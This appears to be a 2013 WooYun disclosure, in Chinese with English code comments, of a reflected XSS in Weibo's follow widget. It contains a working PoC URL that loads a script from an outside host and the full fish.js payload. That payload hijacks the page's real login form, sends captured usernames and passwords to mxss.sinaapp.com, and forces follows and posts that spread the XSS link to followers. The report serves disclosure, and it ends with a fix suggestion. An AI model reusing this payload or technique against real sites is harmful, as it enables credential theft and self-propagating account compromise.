2013-05-08: 细节已通知厂商并且等待厂商处理中
2013-05-08: 厂商已经确认,细节仅向厂商公开
2013-05-18: 细节向核心白帽子及相关领域专家公开
2013-05-28: 细节向普通白帽子公开
2013-06-07: 细节向实习白帽子公开
2013-06-22: 细节向公众公开
某常用页面的参数未过滤,附XSS利用过程。已帮忙关注乌云了,大家也来关注一下吧~~安全意识高的人越来越多了,看到weibo.com的域名也不点,反射型的XSS真心难,求持久化思路。
1. http://widget.weibo.com/dialog/follow.php(加关注对话框页面)的 vsrc 参数未经过滤/转义就输出到了页面脚本中。2. PoC:http://widget.weibo.com/dialog/follow.php?fuid=1922455660&refer=&language=zh_cn&type=widget_page&vsrc=app_followbutton%27%7D%3Bonload=function%28%29%7BSTK.scriptLoader%28%7Burl%3A%27http%3A%2F%2Fmxss.sinaapp.com%2Ffish.js%27%7D%29%7D%3Bb%3D%7Ba%3A%27 。解码后 vsrc 的值为 app_followbutton'};onload=function(){STK.scriptLoader({url:'http://mxss.sinaapp.com/fish.js'})};b={a:' :先用 '} 闭合页面中包裹该参数的 JS 字符串和对象字面量,再注册一个 onload 回调,借页面自带的 STK.scriptLoader 加载外部脚本 fish.js,最后用 b={a:' 重新打开一个字面量,让后面原有的脚本仍能正常解析。注意这是反射型 XSS,需要受害者点击该链接。
3. 该页面自带登录框(点击“换个账号”后显示),payload 直接复用这个真实的登录框来钓取账号密码,无需自己伪造登录框:)。
/*
 * fish.js - the script pulled in by the reflected-XSS vector above (via the
 * page's own STK.scriptLoader), so it runs in the origin of widget.weibo.com.
 *
 * Original author's note, translated: once loaded it submits a follow and
 * posts a weibo, then clicks the "switch account" button so the page shows its
 * login form; the login button and the Enter key get an extra action that
 * sends what was typed to g.php. STK.jsonp is used to submit to g.php and
 * STK.ajax to follow and post; a topic post was added later - that endpoint
 * checks the Referer, so it is done from an iframe.
 *
 * Reviewer notes: this is a self-propagating credential-phishing payload.
 * Every post it creates carries xss_url, so each victim's followers are fed
 * the same vector, and the captured username/password are sent off-site to a
 * third-party host (mxss.sinaapp.com). It relies on the page's STK library and
 * on DOM class names (logout_link, submit_login_btn, WB_input ...) that are not
 * defined here.
 */

// Copy of the reflected-XSS URL with a cache-busting random query parameter;
// it is appended to every post so the payload spreads to whoever clicks it.
var xss_url = "http://widget.weibo.com/dialog/follow.php?fuid=1922455660&refer=&language=zh_cn&type=widget_page&vsrc=app_followbutton%27%7D%3Bonload=function%28%29%7BSTK.scriptLoader%28%7Burl%3A%27http%3A%2F%2Fmxss.sinaapp.com%2Ffish.js%27%7D%29%7D%3Bb%3D%7Ba%3A%27&r="+Math.random();

// Pool of lure texts; one is picked at random as the body of the forced post.
var blogs = [
    '[BOBO害羞]看我如何一夜粉丝十万:',
    '有什么新鲜事想告诉大家?',
    '[lt切克闹]唷唷,切克闹。',
    '马刺VS勇士,加时赛。',
    '太贫困的人是不能重用,俗话说好日子过惯了难过穷日子。',
    '人们常常用咄咄逼人来掩饰弱点,只有软骨头才急躁粗暴,他们因此丧失了人的尊严。',
    '我等待,我观看。恩惠也许来,也许不来。',
    '也许这种既平静又不平静的等待就是恩惠的使者,或恩惠本身。',
    '京华记者现场对阵农夫山泉,8问8答激辩。',
    '爆灯姐丁东丽遭吐槽。',
    '淘宝客:中小卖家淘宝客运营实战篇。',
    '我们中出了2个叛徒,必须烧死。[蜡烛][蜡烛][蜡烛]',
    '次奥,这个炸弹两面都有胶![崩溃]',
    '我不行了,这是我的申请书......',
    '敌人叫我们投降,我从了',
    '炸弹已安置完毕,请求撤离。队长,队长?'
];

// BUG (left as-is): the "+1" shifts the index range to 1..blogs.length, so the
// first lure is never chosen and index == blogs.length yields undefined, in
// which case the post text starts with the literal string "undefined".
var blog = blogs[Math.floor(Math.random()*blogs.length+1)];

// Hashtag prefixed to the topic post.
var topic = "#报告队长#";

// The "switch account" control of the follow dialog. Clicking it brings up the
// page's own login form, which the payload reuses as its phishing form.
var logout_link = document.getElementsByClassName("logout_link")[0];

// Runs the actions on the victim's session: reveal the login form, follow two
// accounts, publish a post, then publish a topic post from a hidden iframe.
// Each STK.ajax call chains the next from its onComplete callback, so the
// requests are issued strictly in sequence. No error handling: any failed
// step silently stops the chain.
function m_post(){
    // Reveal the phishing (login) form.
    if(logout_link) logout_link.click();
    // Follow the WooYun account.
    STK.ajax({url:"/relationship/aj_attention.php",method:'post',args:{uid:1981622273},
        onComplete:function(){
            // Follow the author's account (same uid as fuid in xss_url).
            STK.ajax({url:"/relationship/aj_attention.php",method:'post',args:{uid:1922455660},
                onComplete:function(){
                    // Publish a post that carries the XSS URL.
                    STK.ajax({url:"/public/aj_addMblog.php",method:'post',args:{content:encodeURIComponent(blog+xss_url),appkey:1629860458},
                        onComplete:function(){
                            // Load a same-origin page in a hidden iframe ...
                            var ifm = document.createElement("iframe");
                            ifm.src = "/livestream/listlive.php";
                            ifm.style.display = "none";
                            ifm.id="m_topic_ifm";
                            document.body.appendChild(ifm);
                            // ... and post the topic entry from inside it once it
                            // has loaded (per the author, this endpoint checks the
                            // Referer). The content is double-encoded here -
                            // presumably what addmblog.php expects; unverified.
                            ifm.onload = function(){
                                ifm.contentWindow.STK.ajax({url:"/livestream/addmblog.php",method:'post',args:{content:encodeURIComponent(encodeURIComponent(topic+blog+xss_url)),appkey:2191225368,refer:'www.google.com.hk',language:'zh_cn',url_param:'',_t:0}});
                            }
                        }});
                }});
        }});
}

// Credential capture ("fish"): hook the page's real login button.
var m_submit = document.getElementsByClassName("submit_login_btn WB_btnD")[0];
if(m_submit){
    // Replaces whatever handler the page had set via the onclick property.
    m_submit.onclick = function(){
        var name = document.getElementsByClassName("WB_input input_account")[0].value;
        var pass = document.getElementsByClassName("WB_input input_password")[0].value;
        // Exfiltrate the typed credentials to the attacker host as a JSONP GET,
        // i.e. username and password in the query string of a cross-origin script load.
        STK.jsonp({url:"http://mxss.sinaapp.com/g.php?n="+encodeURIComponent(name)+"&p="+encodeURIComponent(pass)});
        // Re-run the follow/post chain 2 s later, after the login has (presumably) completed.
        setTimeout(function(){m_post()},2000);
    }
    // Treat Enter anywhere on the page as a click on the hooked button.
    document.onkeydown = function(e){
        var num = (e!=undefined)?e.keyCode:window.event.keyCode;
        if(num == 13){
            m_submit.onclick();
        }
    }
}
// First run happens immediately on load, on whatever session the victim already has.
m_post();
一进来就有提交
输入密码后提交并再次关注下
账号密码来咯
某人已关注并add blog
修复建议:vsrc 等参数在输出到 JavaScript 上下文之前应按 JS 字符串规则转义(例如 JSON 编码后再输出,或对取值做白名单校验),而不只是简单“过滤”关键字;同一页面上其它以相同方式输出的参数也应一并检查。
危害等级:中
漏洞Rank:10
确认时间:2013-05-08 13:51
感谢关注新浪安全,已进入内部修复流程。
暂无
可以猥琐思路
@Millet 精了~